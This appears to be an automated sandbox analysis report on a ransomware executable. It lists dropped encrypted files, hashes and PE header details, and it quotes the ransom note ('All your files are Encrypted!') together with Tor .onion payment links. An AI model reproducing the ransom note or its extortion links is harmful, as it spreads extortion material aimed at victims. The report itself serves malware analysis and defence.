                                                                                                                                                      Preview: c..=A...BM......3.4xc.<g.+G..a..Xf4./..0......M..T^5...BE.rG.?....k.5.......!...."....aMD..*..[Q....*..W..%....xMh.'d.).L....sm..D.$.[y%.....%.(.f1].......$..O.....s.....|^3.h..#w......{(..V8CI.......=....Y..V.....N....}.k7....iV.&*'..]i.!.. 2@m.....<.-sZkO.7.p..C.)ak.<.....5]0sw/!.}...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\Videos\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.402796941747291
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:rh8plF2IdO0vut3BWWTrfYOSh97iIs+zK8sevWAVgKTaCB7RZ0cHYIgtyUzyAG:FMuIdO0WJBWWTrAxhViT+zCwgck381
                                                                                                                                                      MD5:15B16F1981D10870FE8F38FD626AFAD5
                                                                                                                                                      SHA1:A3FDD5CACD88D903B21CA9EBD6CBA987ADF7FE01
                                                                                                                                                      SHA-256:2AEC2B80B831E43B471437593A9678BE88503CB0579A5488CD4204DA4FEF7828
                                                                                                                                                      SHA-512:C020E0E09982459637A983EAF9DE6DF73D93688B073BEB7E271776E1597D6FE0871DECBA55C3D9FA99DDF974DC67FFE174DE010457A494069C55477496125814
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: S.].9..%.._.{&<.u.....@.s.R.......U....qQ.".eU.7......F.I.*..#...9'.F.;.l#....(...]e.K...\N....Z...j...M....$...J..d.d.`1..U....B.).Dy.....AB.1...J..,.-..]....s.|B.-....Q.:..Rc.L..~.O[.Qw.{f..$E.,....k..#rMr..=.#.p...Z..D.B2.h;.1.[.(R... .................Ii......-.$..uc.=...s8".G.'Eq..Y...4x.#.J..&..;...r.6.9..&....&^.<..N.z...xe..._.W....|...../e>.V7l..;1...`.W.........,.,#%.h.L........F`.)..Yd.k.K.K;...t....Y./.[..C.G.f,Yz....s.b.....]+.......:.4...d95..iA).U.... ..!$@..s.>. ...3B..*9X.N...Gm.....k.y...)'..Yo.....-.h..^..`Oe.`([....I...fPo2...A..c50.p3....BT.....#.$0....:\....I=S)rw.>PW1.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Videos\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.402796941747291
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:rh8plF2IdO0vut3BWWTrfYOSh97iIs+zK8sevWAVgKTaCB7RZ0cHYIgtyUzyAG:FMuIdO0WJBWWTrAxhViT+zCwgck381
                                                                                                                                                      MD5:15B16F1981D10870FE8F38FD626AFAD5
                                                                                                                                                      SHA1:A3FDD5CACD88D903B21CA9EBD6CBA987ADF7FE01
                                                                                                                                                      SHA-256:2AEC2B80B831E43B471437593A9678BE88503CB0579A5488CD4204DA4FEF7828
                                                                                                                                                      SHA-512:C020E0E09982459637A983EAF9DE6DF73D93688B073BEB7E271776E1597D6FE0871DECBA55C3D9FA99DDF974DC67FFE174DE010457A494069C55477496125814
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: S.].9..%.._.{&<.u.....@.s.R.......U....qQ.".eU.7......F.I.*..#...9'.F.;.l#....(...]e.K...\N....Z...j...M....$...J..d.d.`1..U....B.).Dy.....AB.1...J..,.-..]....s.|B.-....Q.:..Rc.L..~.O[.Qw.{f..$E.,....k..#rMr..=.#.p...Z..D.B2.h;.1.[.(R... .................Ii......-.$..uc.=...s8".G.'Eq..Y...4x.#.J..&..;...r.6.9..&....&^.<..N.z...xe..._.W....|...../e>.V7l..;1...`.W.........,.,#%.h.L........F`.)..Yd.k.K.K;...t....Y./.[..C.G.f,Yz....s.b.....]+.......:.4...d95..iA).U.... ..!$@..s.>. ...3B..*9X.N...Gm.....k.y...)'..Yo.....-.h..^..`Oe.`([....I...fPo2...A..c50.p3....BT.....#.$0....:\....I=S)rw.>PW1.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Videos\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\ntuser.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):976
                                                                                                                                                      Entropy (8bit):5.049005107548797
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1hs7iGWyqdjzK8sevWAVgKTaCB7RZ0cHYIgtyUzf6:7Qy5jzCwgck38M6
                                                                                                                                                      MD5:F9F51287D13E78BA6C0E2890FB72FB53
                                                                                                                                                      SHA1:6FDBB2F4CC5CF8868B37F5B1842BB39788216F53
                                                                                                                                                      SHA-256:44AACBC9BE3BE4974AA6AAB474A6273F9DC2663AB53E3C93B49A7DA89936C88B
                                                                                                                                                      SHA-512:1A12E6D150C10E8DBBA6B4E7E2F9C1E11732A3A01096BC6CF19094C3819323393F65CBA767383F7066DE8F38B06C1FADE384F98B89F843113663421A45F2A9D9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .{..S..zm....u.J.R..lJ....%T...n.h.......=....L..e.......w*...m.ig[.r'<.....x.8&....7......y..Wo..).(..5..Q.m....8.3..R.1X.......D....@Q.....2C.cs&..v..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74...}."..HtR...p..P..5t.'.P.O..e...4{.F>c..W.![..
                                                                                                                                                      C:\Users\user\ntuser.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):976
                                                                                                                                                      Entropy (8bit):5.049005107548797
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1hs7iGWyqdjzK8sevWAVgKTaCB7RZ0cHYIgtyUzf6:7Qy5jzCwgck38M6
                                                                                                                                                      MD5:F9F51287D13E78BA6C0E2890FB72FB53
                                                                                                                                                      SHA1:6FDBB2F4CC5CF8868B37F5B1842BB39788216F53
                                                                                                                                                      SHA-256:44AACBC9BE3BE4974AA6AAB474A6273F9DC2663AB53E3C93B49A7DA89936C88B
                                                                                                                                                      SHA-512:1A12E6D150C10E8DBBA6B4E7E2F9C1E11732A3A01096BC6CF19094C3819323393F65CBA767383F7066DE8F38B06C1FADE384F98B89F843113663421A45F2A9D9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .{..S..zm....u.J.R..lJ....%T...n.h.......=....L..e.......w*...m.ig[.r'<.....x.8&....7......y..Wo..).(..5..Q.m....8.3..R.1X.......D....@Q.....2C.cs&..v..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74...}."..HtR...p..P..5t.'.P.O..e...4{.F>c..W.![..
                                                                                                                                                      C:\Users\user\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\bootTel.dat
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):5.251333012214167
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:vfkd/dNU6NbzK8sevWAVgKTaCB7RZ0cHYIgtyUz6z3:v2dNU+zCwgck38VD
                                                                                                                                                      MD5:05D91B7EEC5B64E380A313B773CBD7C9
                                                                                                                                                      SHA1:83458391DDCFE216053C176E2F3D108A4DBE611B
                                                                                                                                                      SHA-256:99C25E36436099FE66214D3111FCB598F06E8BD9ED900E8387FDAAD50AB2730C
                                                                                                                                                      SHA-512:2098FCBEBB6FB6974F961B1F91B441ABD889BF4938A1BD914F5A8D7FD2D672789A30E55BB7FF29A9F94576D0E3C21FD8435DA4B7FABD7A5E57959E8687BA68F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...$.?f*=.1..'9...7.D..O.u...UY..4...9.......%,......-..|+.....sR`.R..^%A..wv.jJP.X.a....@..=.G...W.!lml.19#.?...06...r..u....C1.o.9..I..#....\...P.c.@.lm...A...F...zP.T9./C...%..H.W/.b.;.5.C......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74..i.....]S.1....d.}..m.
                                                                                                                                                      C:\bootTel.dat.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):5.251333012214167
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:vfkd/dNU6NbzK8sevWAVgKTaCB7RZ0cHYIgtyUz6z3:v2dNU+zCwgck38VD
                                                                                                                                                      MD5:05D91B7EEC5B64E380A313B773CBD7C9
                                                                                                                                                      SHA1:83458391DDCFE216053C176E2F3D108A4DBE611B
                                                                                                                                                      SHA-256:99C25E36436099FE66214D3111FCB598F06E8BD9ED900E8387FDAAD50AB2730C
                                                                                                                                                      SHA-512:2098FCBEBB6FB6974F961B1F91B441ABD889BF4938A1BD914F5A8D7FD2D672789A30E55BB7FF29A9F94576D0E3C21FD8435DA4B7FABD7A5E57959E8687BA68F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...$.?f*=.1..'9...7.D..O.u...UY..4...9.......%,......-..|+.....sR`.R..^%A..wv.jJP.X.a....@..=.G...W.!lml.19#.?...06...r..u....C1.o.9..I..#....\...P.c.@.lm...A...F...zP.T9./C...%..H.W/.b.;.5.C......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74..i.....]S.1....d.}..m.
                                                                                                                                                      C:\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):7.43420039841384
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                      File name:Mm7Yq5V7Lu.exe
                                                                                                                                                      File size:368640
                                                                                                                                                      MD5:2f121145ea11b36f9ade0cb8f319e40a
                                                                                                                                                      SHA1:d68049989ce98f71f6a562e439f6b6f0a165f003
                                                                                                                                                      SHA256:59e0ab333060b4e510db5d36d87f0fe267ab66b0881955649b06d91d6dd2d486
                                                                                                                                                      SHA512:9211a74cfa23c70c6ace8bd168ecbe1bb4a06d2e03b5adff5546115137b6ce849d3e41337581123d48e5082319f507d8f2d274621317fada182530e4a0abb6c7
                                                                                                                                                      SSDEEP:6144:wV2wg8YeX+AbD+b5LKysUMRci1qlVPuYweoXfNSkB7mOB2z4tM:SPOAi2ysVqlVXx4NSc7RB2z4
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a..............P.................. ........@.. ....................................@................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                                      Static PE Info

                                                                                                                                                      General

                                                                                                                                                      Entrypoint:0x45b50e
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                      Time Stamp:0x61D547FF [Wed Jan 5 07:25:51 2022 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                      Entrypoint Preview

                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
